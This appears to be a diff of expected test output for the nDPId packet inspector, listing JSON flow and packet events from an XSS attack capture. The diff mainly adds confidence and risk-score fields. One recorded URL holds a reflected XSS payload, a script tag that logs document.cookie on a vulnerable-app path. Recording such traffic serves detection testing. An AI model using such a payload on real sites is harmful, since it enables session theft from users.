 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1614,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":2,"flow_last_seen":1499347160581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347160581,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0+J0ull0RvvddKAScSB55wAAAgQFtAQCCAoD43XCATmkTAEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1615,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":3,"flow_last_seen":1499347160582,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347160582,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eUBAAD4GTJisEAABwKgKMtPiAFBG+910dLpZdYAQAOUY7wAAAQEICgE5pEwD43XC"}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347035750,"flow_last_seen":1499347041619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347161627,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52938,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347035750,"flow_last_seen":1499347041619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347161627,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52938,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347035750,"flow_last_seen":1499347041619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347161627,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52938,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347038276,"flow_last_seen":1499347043619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347161627,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52964,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347038276,"flow_last_seen":1499347043619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347161627,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52964,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347038276,"flow_last_seen":1499347043619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347161627,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52964,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347039587,"flow_last_seen":1499347044619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347161627,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52978,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347039587,"flow_last_seen":1499347044619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347161627,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52978,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347039587,"flow_last_seen":1499347044619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347161627,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52978,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347042150,"flow_last_seen":1499347047620,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347161627,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53004,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347042150,"flow_last_seen":1499347047620,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347161627,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53004,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347042150,"flow_last_seen":1499347047620,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347161627,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53004,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347043416,"flow_last_seen":1499347048620,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347161627,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53018,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347043416,"flow_last_seen":1499347048620,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347161627,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53018,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347043416,"flow_last_seen":1499347048620,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347161627,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53018,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1635,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347163177,"flow_last_seen":1499347163177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347163177,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54268,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1635,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1499347163177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347163177,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YKVAAD4GZSusEAABwKgKMtP8AFCcucZwAAAAAKACchB\/fgAAAgQFtAQCCAoBOabVAAAAAAEDAwc="}
@@ -557,7 +557,7 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1499347165741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347165741,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vRVAAD4GCLusEAABwKgKMtQYAFCo9hRDAAAAAKACchAi0gAAAgQFtAQCCAoBOalWAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1660,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":2,"flow_last_seen":1499347165741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347165741,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1BjYjd6VqPYURKAScSDt3QAAAgQFtAQCCAoD43rMATmpVgEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1661,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":3,"flow_last_seen":1499347165742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347165742,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vRZAAD4GCMKsEAABwKgKMtQYAFCo9hRE2I3eloAQAOWM5QAAAQEICgE5qVYD43rM"}
-01005{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1671,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347163177,"flow_last_seen":1499347167004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"ts_msec":1499347167004,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54268,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%270XVM4C1CNSWY8VF443GGZ6W527WBY4H29E2XQNGG2QUPQEKW0U%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
+01111{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1671,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347163177,"flow_last_seen":1499347167004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"ts_msec":1499347167004,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54268,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%270XVM4C1CNSWY8VF443GGZ6W527WBY4H29E2XQNGG2QUPQEKW0U%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1678,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347168302,"flow_last_seen":1499347168302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347168302,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54322,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1678,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1499347168302,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347168302,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8pdZAAD4GH\/qsEAABwKgKMtQyAFAP+Q4AAAAAAKACchC\/eAAAAgQFtAQCCAoBOavWAAAAAAEDAwc="}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1679,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":2,"flow_last_seen":1499347168302,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347168302,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1DJusJVZD\/kOAaAScSA7HQAAAgQFtAQCCAoD431NATmr1gEDAwc="}
@@ -566,17 +566,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1687,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1499347169573,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347169573,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83TtAAD4G6JSsEAABwKgKMtRAAFDvZ3AvAAAAAKACchB8jgAAAgQFtAQCCAoBOa0UAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1688,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":2,"flow_last_seen":1499347169574,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347169574,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1EA8SVzP72dwMKAScSBh5gAAAgQFtAQCCAoD436LATmtFAEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1689,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":3,"flow_last_seen":1499347169574,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347169574,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03TxAAD4G6JusEAABwKgKMtRAAFDvZ3AwPElc0IAQAOUA7gAAAQEICgE5rRQD436L"}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347044676,"flow_last_seen":1499347050622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347171659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53032,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347044676,"flow_last_seen":1499347050622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347171659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53032,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347044676,"flow_last_seen":1499347050622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347171659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53032,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347047249,"flow_last_seen":1499347052623,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347171659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53058,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347047249,"flow_last_seen":1499347052623,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347171659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53058,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347047249,"flow_last_seen":1499347052623,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347171659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53058,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347048548,"flow_last_seen":1499347053624,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347171659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53072,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347048548,"flow_last_seen":1499347053624,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347171659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53072,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347048548,"flow_last_seen":1499347053624,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347171659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53072,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347051144,"flow_last_seen":1499347056624,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347171659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53098,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347051144,"flow_last_seen":1499347056624,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347171659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53098,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347051144,"flow_last_seen":1499347056624,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347171659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53098,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347052434,"flow_last_seen":1499347057625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347171659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53112,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347052434,"flow_last_seen":1499347057625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347171659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53112,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
